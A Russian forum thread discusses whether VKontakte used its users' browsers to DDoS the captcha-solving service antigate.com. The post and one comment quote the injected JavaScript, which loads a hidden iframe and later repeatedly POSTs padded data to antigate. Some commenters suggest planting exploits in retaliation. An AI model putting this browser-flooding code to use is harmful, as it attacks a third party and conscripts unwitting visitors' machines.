ВКонтакте ДДОСит сервис платного распознавания капчи antigate.com?

Случайно обнаружил в консоли браузера, что ВКонтакте делает фоновые запрос по адресу antigate.com/in.php?first_and_last_warning=on

Параметр в ссылке символичен: «первое и последнее предупреждение»

Следующая функция появилась на каждой страничке на сайте, вызывается по событию «onload»:

function _test () {

var

fr=utilsNode.appendChild (ce ('iframe')), d=fr.contentWindow.document;d.open ();d.write ('
this.location="http://ant'+'iga'+'te.com/i'+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+'g=o'+'n";</sc'+'ript>');setTimeout (re.pbind (fr), 1000);<br> }</body></html>

Лучшие комментарии

Добавить 99 комментариев

  • Ответить
    Альтер Эго

    > Вот тебе уголовщина в чистом виде. Денежка из кармана уплывает? Уголовщина, не уголовщина — мои симпатии на стороне ВК.

  • Ответить
    Альтер Эго

    Интересно, за сколько секунд Antigate прилег? У меня function _test () проходит как security error, но она тоже есть.

  • Ответить
    Альтер Эго

    А когда это Дуров меккой стал? Что он делает правильно? Я считаю с этим должны нужные органы разбираться, как с antigate, так и с выходками Дурова.

  • Ответить
    Альтер Эго

    Антигейтовцам осталось изменить на какое-то время морду, запихав на нее вирусов, и отдавать всем? first_and_last_warning=on Хотя они не часто из 500-х выходят (но пару раз морда все-таки загрузилась).

  • Ответить
    Альтер Эго

    Согласен. Наркоманы — тоже не люди. Пойти их мочить? А еще мне курящие не нравятся… Тоже?

  • Ответить

    Я правильно понимаю, что сейчас вконтакте забивает интернет-каналы всей страны? Что от этого страдает не только сайт антикапчи, но и все промежуточные узлы. А представьте ситуацию, если кто-то выходит через мобильный интернет в области, избыточный траф = избыточные платежи, а если у кого-то канал слабый (например, школы в регионах), то это может привести их к отключению от интернета. И если antigate просто добавит здоровенный файл на тот урл (с разрешением кеширования), то нагрузка в большей степени уйдет на кеширующие сервера и пользователи просто отвалятся. И разделит ли вконтакте ответственность если antigate закинет вредоносный код на ту страницу?

  • Ответить
    KcepoKc VK

    Со спамерами только так и надо! Только непонятно, откуда столько кукарекающих анонимов бросилось их защищать. А, нет, [url=http://roem.ru/2012/04/18/addednews46914/?c#message125574]понятно[/url].

  • Ответить

    Люди с мобильным интернетом обычно пользуются мобильной версией или мобильными приложениями ВКонтакте, а там этого кода нет. А насчёт вредоносного кода хороший вопрос, кстати. Антигейт уже перенаправили адрес.

  • Ответить
    Альтер Эго

    Георгий (KcepoKc), ну напишите уже в профиле, что вы сотрудник пресс-службы Вконтакте. Как нам, сотрудникам другой компании воспринимать ваши комментарии: как мнение пресс-службы, или как ваше личное мнение (сомневаюсь что оно отличается от пункта 1)?

  • Ответить

    Сейчас там function _test (){var fr=utilsNode.appendChild (ce (‘iframe’)), d=fr.contentWindow.document;d.open ();d.write (‘<script>var XHR=window.XDomainRequest||window.XMLHttpRequest, xhr=new XHR ();xhr.open («POST»,"http://ant’+’iga’+’te.com/i’+’n.php", true);xhr.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");var tmp2="e8532291e45ec27a85e87692e070da98″;for (i=0;i<5;++i)tmp2+=tmp2;xhr.send («method=base64&key=fb856f0ab752e3894fbdb3c4613ca924&body="+tmp2+"&ext=jpg»);</sc'+'ript>');d.close ();setTimeout (re.pbind (fr), 1000);}

  • Ответить
    pir

    КсерВКс — пора, собирать ссылки на ваши проконтактовские комментарии в блокнотик и каждый раз отвечать ими

  • Ответить
    Альтер Эго

    Закон есть закон, а пока мыслим «ну они же хорошие парни, значит им можно» так и живем, с ментами насилующимим бутылками из-под шампанского. Они же тоже хорошие парни, им можно

  • Ответить
    Альтер Эго

    ВК стоит на иллюзии, что только они могут производить автоматизацию своей деятельности вокруг какого-либо естественного явления жизни. Что-то вроде их священного права на чужое общение. Вокруг этого «священного права» создаются бесконечные легенды. Хорошие (вк) противопоставляются плохим (все остальные). Ставятся бесконечные кордоны и проблемы, а свои «таможенники» собирают пошлину и «помощь» в преодолении этих проблем. Но суть остается одна — право на общение, это наше право, а не ВК.

  • Ответить

    Очень хочется услышать комментарий Дурова. Он же здесь появлялся по удобным поводам, пусть явится и по этому, эпичному.

  • Ответить
    Альтер Эго

    Про ИПО можно забыть. Как они будут объяснять заграничным пользователям, что регистрируясь вконтакте те попадают в ботнет?

  • Ответить

    Потратил 80 мегабайт мобильного трафика на скачивание CureIT после того, как у меня вдруг стал открываться xvideos.com I want my money back! >:-)

  • Ответить

    Поддерживаю данный ход со стороны сайта ВКонтакте, Павлу респект. Вопрос к Павлу, если он зайдет в тред: Было бы классно увидеть в ближайшее время API к данной функции. Имеет смысл ожидать API?

  • Ответить
    Альтер Эго

    Павлик заболел основательно… Это тоже самое если бы Facebook начал ежесекундно от каждого пользователя отсылать пост запрос на vk.com. Мотивирую это какими-нибудь личными обидами на vk. Маразм крепчает. Выздоравливайте!

  • Ответить

    Ну, хоть что то.хотя, в целом смешное действие. Пока спам приносит большие деньги — будут спамить, а в случае с ВКонтакте деньги не просто большие, а очень очень большие (в 2011 году некоторые умельцы делали по 15 тысяч $ в день, и думаю это не предел. Что действительно надо делать? Создать юридический отдел, который будет абузить и добиваться исполнения требований от провайдеров, хостеров, операторов, контент провайдеров и прочих. Надо создать атмосферу когда Вконтакте будет ассоицироаться с проблемами не только у бабушек, но и у любителей нажиться на этих бабушках. Это вдарит по заработка спамеров, сильно увеличит «цену входа» которая сейчас состоит из всего лишь софта, дедика и акков (~300 $) и снизит рентабильность (серые контент провайдеры перестанут работать по ВК, а черные берут в 3 раза больше еще и шейфят трафик. Для острастки можно найти еще и пару жертв спама в ВК и инициировать уголовные дела. Все, я выговарился. П.С. Кстати, а если бы антикапча продала трафика на сплойты, ВК бы не слабо выхватил) ведь у всех ботов был бы акк в вкшный, ну, а вреде и угрозе для пользователя я вообще молчу.

  • Ответить
    pir

    «alterneo» Зачем было вставлять код и создавать бот-нет? Развивая тему, почему бы тогда не взять пару-тройку джипов крепких ребят, биты шокеры, травматику и приехать и конкретно опустить владельцев антигейта. А в больнице у них уже появится время на подумать. Типа первое и последнее предупреждение.

  • Ответить

    В долгосрочной перспективе ВК делает очень полезное дело .) Важно, на чьей стороне симпатии пользователей, а не спамеров и кучки интернет-экспертов, которые поддерживают спамеров потому, что действия ВК кажутся им «сомнительными» .) Принцип меньшего зла.

  • Ответить

    Вы забыли о еще одной очень важной стороне капчи. Порой это плата за доступ к информации. Именно плата, а не ограничение. Напомню вам про проект decapcha, который был куплен Google. Суть проекта — сделать так, чтобы капчи приносили пользу — повесить на них задачи распознавания сложных мест в отсканированных текстах (на сгибе, на поврежденных носителях и т. д.). Сейчас эта технология применена еще и к распознаванию номеров домов в google-street. Поэтому фактически капча во многих проектах стала не ограничением, а принуждением пользователей к труду взамен на доступ к информации. Различные сервисы антикапчи, позволяют не только масштабировать решение рутинных задач ручной обработки данных, но и получить доступ к таким сервисам не за труд, а за деньги.

  • Ответить

    бедные-бедные клиенты антигейта, сча срочно переключаются видать на других провайдеров антикапчи. а такой казалось прикольный бизнес — бери себе да капчи распознавай. кто ж мог подумать, что прям так вот, белые проекты, а не конкуренты, ддосить будут?)))))

  • Ответить

    Знаете, а я лично против такого подхода. Правильно сказали — если я против курящих мне что ходить и бить их? Естественно это неправильно будет! Бороться надо законными способами, а тут получается, что ВК решил олицетворять мировое добро которое сейчас вдруг победит всё зло? А почему решили что зло действительно им является? Сервис антикапча это всего лишь сервис — и да им пользуются спамеры, но и не только. ВКонтакте тоже пользуются спамеры, так может вконтакте тоже зло? Да и потом — хочешь бороться — неужели нельзя законными методами это делать? p. s. почему я должен участвовать в их инициативе без собственного согласия? я пользуюсь их сервисами, но не подписывался на такое

  • Ответить
    Альтер Эго

    2 soomrack >Поэтому фактически капча во многих проектах стала не ограничением, а принуждением пользователей к труду взамен на доступ к информации. Различные сервисы антикапчи, позволяют не только масштабировать решение рутинных задач ручной обработки данных, но и получить доступ к таким сервисам не за труд, а за деньги. Если бы Гуглу такое было надо — сделал бы сам доступ за деньги вместо распознавания картинок, а на эти деньги сам бы организовал платное распознавание своих же картинок.

  • Ответить

    > Если бы Гуглу такое было надо — сделал бы сам доступ за деньги вместо распознавания картинок, а на эти деньги сам бы организовал платное распознавание своих же картинок. Это повлекло бы кучу юридических обязательств и создало бы большие сложности. Кроме того пользователи не готовы платить деньги, но им не напряжно раз в день потратить 10 сек. (утрирую) и сделать «доброе» дело.

  • Ответить
    Mary Малина Nival Network

    Хм, может я глупая или фаерфокс глючит, но вконтате не запускает Флеш приложения, тоесть ни музыку, ни видео, ни приложения. Все же фаерфокс тупит? Пропробовала через IE — все идет. странно.

  • Ответить
    Альтер Эго

    Юр, а что за история с премией? http://habrahabr.ru/post/43171/ Как многие помнят, в прошлом году наше участие в конкурсе «Премия рунета» закончилось неприятностями для оргкомитета. Даже десятая часть наших пользователей не смогла проголосовать за ВКонтакте в «Народном голосовании», так как как сайт премии не выдерживал нагрузок из-за количества желающих проголосовать. … Сегодня ночью мы пустили небольшой тест-драйв сайта премии. Сейчас около 10% пользователей ВКонтакте незаметно обращаются к сайту премии, как если бы они хотели посмотреть на страницу голосования. Момент выбран весьма щадяще — сейчас в шестом часу утра в субботу мы наблюдаем недельный и суточный минимум посещаемости Контакта. Но сайт премии, несмотря на весьма низкую загрузку, завис. Если бы мы пригласили пользователей не посмотреть, а «проголосовать», да еще в дневные часы, все было бы совсем печально. (это пост Дурова в своем вк-блоге, на данный момент недоступный)

  • Ответить
    Альтер Эго

    Методы Дурова сродни его фамилии — дурацкие. Это путь в никуда. Будет полный ППЦ, если все начнут так действовать… Давайте припомним кому еще нахамил Дуров? Похоже, что мэйлру с его пулом социальщины тоже нужно начать ддосить ВК Дурова… А это уже не смешно…

  • Ответить
    Альтер Эго

    Я как пользователь хочу подать в суд на ВК за использование меня в качестве боевой единицы в DDoS. Как это правильно сделать?

  • Ответить
    Альтер Эго

    Вот кстати действительно интересно бы услышать мнение официальных лиц контакта на тему «Мы используем незаконные методы борьбы с сервисами, которые нам мешают». Если уж быть белым и пушистым — может имеет смысл в суд сходить? А не ддосить с компов их клиентов. Причем на хабре люди пишут «мне полезла порнуха — я кинулся через gprs качать антивирус». Это конечно для ВК не деньги — но как то некрасиво. Да — что было понятно — я не считаю что антигейт белый и пушистый. Но если хочешь разбираться и оставаться в правовом поле РФ — только по закону — а не по «понятиям».

  • Ответить

    >> Я как пользователь хочу подать в суд на ВК за использование меня в качестве боевой единицы в DDoS. Как это правильно сделать? Ты не пользователь, ты инструмент. Вещь.

  • Ответить
    Альтер Эго

    >Причем на хабре люди пишут «мне полезла порнуха — я кинулся через gprs качать антивирус». У меня не полезла. Подозреваю что ни у кого не полезла.

  • Ответить
    Альтер Эго

    Очень любопытно, как пацанские методы ведения бизнеса перекочевали от инвесторов ВКонтакта к его руководителям. Далеко пойдут!

  • Ответить
    Mary Малина Nival Network

    Разговор ушел далеко от темы, в суд уж подаете. Вообще ВК всегда какую-то чушь делает, воду мутит. Хотя черный PR- тоже PR…Дурная слава- тоже слава.

  • Ответить
    Mary Малина Nival Network

    Teodorix, я на Goship подписана кст) не распугивайте аудиторию ;) p. s.не против услышать или увидеть примеры черного PR или дурной славы Nival’а *не считая троллинг-форумов* ?

  • Ответить

    Mary, ой, не надо. В смысле, не будем про дурную славу Нивала, ладно? А то ведь превратить тред в лёгкую головную боль для сотрудников PR департамента нежно любимой компании можно за пять минут .) Лучше спросите коллег .)

  • Ответить
    Елена Минц Mail.Ru Group

    Уважаемый KcepoKc ! Я, как представитель пресс-службы Mail.Ru Group, хочу сказать, что на самом деле я (равно как и мои коллеги) сегодня вовсю занимаюсь годовым отчетом, публикация которого произойдет в ближайший час. И, поверьте, это гораздо более серьезное дело, чем ваша писанина от анонимный акканутов. А если вам кажется, что писать замечания и задавать неудобные вопросы могут только сотрудники Mail.Ru Group, вы глубоко ошибаетесь.

  • Ответить

    Странно, что кто-то в этом видит *сервис*. Хотя не так уж и странно — спамеры (включая смошников и сеошников, разумеется) имеют специфические взгляды на мир. Всех этих мудаков не ддосить надо, а по колониям рассаживать.

  • Ответить
    Альтер Эго

    Такие выводы можно сделать и о Вконтакте: предоставляют хостинг для нелицензионного аудио и видео. Как сами отвечают, так виноваты пользователи — с них взятки гладки. А в чем виноваты владельцы антигейта? В том, что их сервисом спасены пользуются? Так могут и нормально использовать, рекапча в пример. Но как и у Вконтакте с аудио, применение идет в основном не в рамках закона. Вконтакте даже прокомментировать не соизволили. Двойные стандарты везде. А на Mail.ru так не жалеют своего времени.

  • Ответить
    Альтер Эго

    >Это повлекло бы кучу юридических обязательств и создало бы большие сложности. Кроме того пользователи не готовы платить деньги, но им не напряжно раз в день потратить 10 сек. (утрирую) и сделать «доброе» дело. Если так, то пользователям antigate не нужен, он нужен кому-то другому, кто хочет распознавать много капч и не тратить на это время. Т.е. тому, кто использует чужой функционал автоматизировано и с нарушениями (в обход API).

  • Ответить

    Сначала Вконтакте включил во все свои страницы фрейм с недоверенного и потенциально вредоносного сайта. Этот фрейм мог содержать все что угодно, включая скрипты, флеши и всякую бяку эксплуатриующую уязвимости в браузерах. Или вывод алерта с приветами Дурову. Но почему-то не содержал. Потом кто-то понял что объобшибся, и вместо фрейма вставил кросс-доменный POST-запрос через аякс, который не работает в большинстве браузеров. То бишь объобшибся еще раз. С учетом «профессионализма команды разработчиков», на DDoS атаку это мало похоже, больше похоже или на неудавшийся хак или на спланированный PR antigate.

  • Ответить
    Альтер Эго

    Антигейту достаточно теперь просто резать все эти кривые пост-запросы через аякс, благо от запросов клиентов они много чем отилчаются. Им, правда, придется научиться роутеры настраивать, ноэто дело наживное и навык полезный.

  • Ответить
    Альтер Эго

    >С учетом «профессионализма команды разработчиков», на DDoS атаку это мало похоже, больше похоже или на неудавшийся хак или на спланированный PR antigate. Вот это глубина мысли! Но, говорят, миром правит не тайная ложа, а явная лажа.

  • Ответить

    В конце 90х годов был момент, когда одна рекламная сеть при показе (или клике? боюсь уже ошибиться) на каждый из своих баннеров делала маленький запрос на конкурирующую рекламную сеть. В результате эта вторая сеть, меньших размеров, лежала плашмя; пока они не договорились о каких-то уступках и прогибах с «большой» рекламной сетью.

  • Ответить
    Альтер Эго

    Ну вот, теперь стало понятно что Дуров имел в виду, говоря «как в большинстве европейских городов».

  • Ответить

    Кто с кем судиться-то будет? Частные лица с ВК — вряд ли, а Антигейт уж и подавно — ему чем меньше шумихи, тем лучше.

  • Ответить
    Альтер Эго

    DDOS это уголовщина, а не гражданский суд значит прокуратура может и сама завести дело и без заявлений

  • Ответить

    Вот редирект такой совершенно безотвественен со стороны В контакте. А если бы рядом был маленький ребенок, а у меня тут Xvideos открылось? Дуров, о чем вы думаете вообще. Ваше поведение не просто возмутительно, оно безобразно. Я жду ваших извинений и официальных коментариев. Вы подвели своих пользователей. Вы их обманули. Ваша социальная сеть была для меня любимой социальной сетью, однако теперь меня терзают смутные сомнения. Вдруг вы опять провернете что-то такое? Нельзя так поступать. Вы тоже много кому не нравитесь, вас за это не DDoS-ят. Позор. Я думаю, большинство присоединится к моему мнению. Также

  • Ответить

    Вот редирект такой совершенно безотвественен со стороны В контакте. А если бы рядом был маленький ребенок, а у меня тут Xvideos открылось? Дуров, о чем вы думаете вообще. Ваше поведение не просто возмутительно, оно безобразно. Я жду ваших извинений и официальных коментариев. Вы подвели своих пользователей. Вы их обманули. Ваша социальная сеть была для меня любимой социальной сетью, однако теперь меня терзают смутные сомнения. Вдруг вы опять провернете что-то такое? Нельзя так поступать. Вы тоже много кому не нравитесь, вас за это не DDoS-ят. Позор. Я думаю, большинство присоединится к моему мнению.

  • Ответить
    Альтер Эго

    Antigate чота протупили совсем, вместо Xvideos нуно было эксплойтов напихать — вот тада бы действительно ботнет душевный вышел. и можно в ответку начать вк дидосить)

  • Ответить
    Альтер Эго

    Да можно было много всего хорошего сделать, вконтакт же их к себе во фрейм подгружал, значит у них доступ был к их странице. можно было пользователям что-нибудь хорошее на стене написать, например. или дурову привет послать.

  • Ответить
    Альтер Эго

    >У фреймов с разных доменов нет доступа друг к другу обсуждали ли уже совсем недавно, причем опять же в посте про вконтакте у дочернего фрейма есть доступ к родительскому

  • Ответить
    jet

    Не слушайте глупостей, и у дочерних фреймов тоже конечно же нет доступа к родителю, иначе бы все баннеры могли что угодно творить на сайтах, где их вставляют. http://stackoverflow.com/questions/1378433/cross-domain-url-access-from-iframe-using-javascript [QUOTE] I need to access the Parent Domain URL from my Iframe which is in another domain. For example: example.com is my website which is in Iframe of another parent (google.com) domain. Here i need to access the parent domain URL in my example.com. i.e I need to get the URL google.com in my example.com. Parent domain cannot be hard coded. I tried with the following code window.parent.location.href () this results in Access denied error. How to achieve this. ---------- You might want to take a look at these questions/answers; they could give you some informations concerning your problem: * cross domain access in iframe from child to parent * javascript access parent DOM across domains? * How to access parent Iframe from javascript To make things short: accessing iframe from another domain is not possible, for security reasons — which explains the error message you are getting. The Same origin policy page on wikipedia brings some informations about that security measure: In a nutshell, the policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions — but prevents access to most methods and properties across pages on different sites. A strict separation between content provided by unrelated sites must be maintained on client side to prevent the loss of data confidentiality or integrity.[/QUOTE] Иногда бывают некоторые способы доступа, но это эксплуатация уязвимостей в браузерах, а не рабочее правило, то есть работать будет только на некоторых версиях.